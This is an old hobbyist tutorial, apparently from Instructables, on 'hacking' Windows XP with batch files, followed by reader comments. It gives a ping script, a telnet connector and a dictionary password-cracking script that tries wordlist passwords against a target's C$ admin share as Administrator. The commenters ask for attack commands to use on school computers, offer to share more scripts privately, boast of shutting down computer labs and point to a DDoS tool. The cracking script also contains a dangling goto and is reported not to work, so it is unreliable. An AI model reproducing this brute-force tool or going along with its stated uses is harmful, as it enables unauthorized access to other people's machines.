Hacking(sort Of) Windows XP With Batch Programs





Introduction: Hacking(sort Of) Windows XP With Batch Programs

Basicly this instructible will teach you how to hack windows computers using the cammand prompt and batch programs.

Step 1: Ping

Ping is a default program in Windows that can be used to ascertain whether your intended target is online or not. The following script uses the ping command tho u could just use the ping command in cmd. It would allow more control over the pinging.

@echo off
Title Pinger
Color a
set /p t=Target IP Adress:
Ping %t%

This code is typed up in notepad or some other text editor. it is then saved with the file extension .bat

Step 2: Telnet

@echo off
color a
title Telnet
set /p ip=Target IP:
set /p prt=Port (default: port 23):
set yn=
set /p yn=Establish a connection (y/n):
if %yn%==y goto tel
if %yn%==Y goto tel
if %yn%==n goto start
if %yn%==N goto start
telnet %ip% %prt%
goto start

Type this into Notepad,change file type to All Files, and save as "Telnet.bat".

used properly telnet can can allow direct access to a computers hard drive. once you learn how to use telnet you can use it to delete and copy files to and from your target computer. telnet hacking is a science all its own. learning everything you can do with telnet takes time but it's worth it. as with everything else you could probably find a tutorial on telnet use on the interwebs. to learn its basic commands you could type "telnet /?".

Step 3: Password Crackers



@echo off

title Net Crker by The SYNer

color a



net view



set /p ntar=Target (i.e. \\joel):


set /p ffile=wordlist Location(i.e. C:\words.txt):


set /p fname=Name of file(i.e. list.txt):

copy "%ffile%" "C:\lst.txt" >nul


for /f "usebackq" %%i in (C:\lst.txt) do net use %ntar%\C$ %%i /u:Administrator && @echo Username:Administrator && echo Password:%%i




goto crk-c1


Copy and paste this into Notepad,change file type to All Files, and save as "NET_CRK.bat".

this program uses a brute force dictionary attack. it is time consuming and one of the slowest ways of breaking a password. but if you have the time and your Dictionary list contains the password it will work.
the trick to breaking the password is to make a good Dictionary list. usually you make a custom list for every password. the trick is to think of passwords that that person would use. unfortunately though it requires that you know this person.

Step 4: Limitations

these things only work if you have administrative privileges. also there is only so much that you can do from command prompt. when it comes to real hacking(dos, phishing, viri, etc.) you need to know a programming language or at least HTML(phishing). using the command prompt is more of a starting point. after which you move on to more advanced hacking.



    • Colors of the Rainbow Contest

      Colors of the Rainbow Contest
    • Woodworking Contest

      Woodworking Contest
    • Pets Challenge

      Pets Challenge

    We have a be nice policy.
    Please be positive and constructive.




    good 'ible, but i have some questions:
    code sample i am going to talk about:
    set /p ffile=wordlist Location(i.e. C:\words.txt):
    set /p fname=Name of file(i.e. list.txt):
    copy "%ffile%" "C:\lst.txt" >nul

    look at the bits in bold italic, WHERE ARE THESE FILES AND WHAT ARE THEY?

    2 replies

    wow, talk about late. lst.txt is a file of your making that contains the dictionary.

    Thank you for finally replying.

    Six long years I waited patiently.

    I now understand batch programs.

    Thank you again.

    (I'm joking around)

    I made a much better DDoS program with batch venoc.wordpress.com My website for the DDoS program

    Getting me wrong (haha)..My mistake..actually i tryin to say that post some more cmd "tricks"...
    And Yeah the "For" Command is Really useful...

    1 reply

    Oh, alright. Hmm let's see what I can remember...

    Im a noob so what do you mean by "brute force dictionary attack"?

    4 replies

    this is really old stuff and I'm not sure if it still works.

    Anyways, a brute force dictionary attack is a simple means of finding passwords. Basically it consists of trying to login with a list of words(a dictionary perhaps). It just tries all of the words in a list until one of them works.

    Brute force attacks aren't very effective any more because most logins lock after a certain number of failed logins.

    These batch scripts are old and they were made for windows xp. Batch scripts aren't very useful for gaining access anymore, but you can still make some rudimentary viruses. Viruses that fu*k things up by opening a sh!t ton of new windows, crashing or freezing the computer in the process. I wrote one that just ate up memory by creating text files and it was pretty effective.

    Also if you could post some attack commands. We have windows xp at school and i would love to try it out.

    "Attack Commands"? I mean no offence, but if you think that such commands exist then you are very mistaken about the nature of hacking. To hack is to modify or create a program, usually with malicious intent, that circumvents security protocols or does something that deviates from the intended use of the system that this program is run on. The individual commands aren't designed to hack. It is their implementation that constitutes the hack.

    "Attack" commands don't exist. An assortment of commands may "attack" one system or another, but batch commands that "attack" don't exist...unless you decide to make your own. Batch commands are actually just individual programs that are called upon when needed. So if you created an attack program and placed it in the directory that your batch file was running in or in the default directory that the command prompt uses, you would have an attack command. That would be very bad-ass and if you do decide to make such a thing you should totally make an instructable about it.

    Also I do have an assortment of batch scripts and cmd programs for that sort of thing. I would be more than happy to send you all the relevant stuff. Just PM me your e-mail.

    PS- One of the most important things about being a hacker is to never publicly divulge any of your past, present, or future actions/hacks. Though once upon a time SWIM(someone who isn't me) shut down like 3 computer labs and totally got away with it. XP systems are so vulnerable to the CMD.

    Okay that's pretty cool. Im a noob and really want to learn about batch files and things of that nature. I was wondering can you send a example of some type either here or to my email. Would be awesome.

    Dude just open up your command prompt and type in "/?". It will show you a bunch of commands. I'm especially fond of the "for" command. It's so very useful.

     That was a great instructable, helped me get a little more grasp on this new computer world im learning about. Thank You!

    1 reply

    i tryed using the net cracker but it just said

    *"was unexpected at this time
    press any key to continue . . .
    plz help

    1 reply

    i'm going 2 update the code cuz i messed up part of it

    what do you mean by the location of a text files,give examples

    1 reply

    It means the location a text file containing a list of passwords. i.e. C:\wordlist.txt The file must be in C:\ no""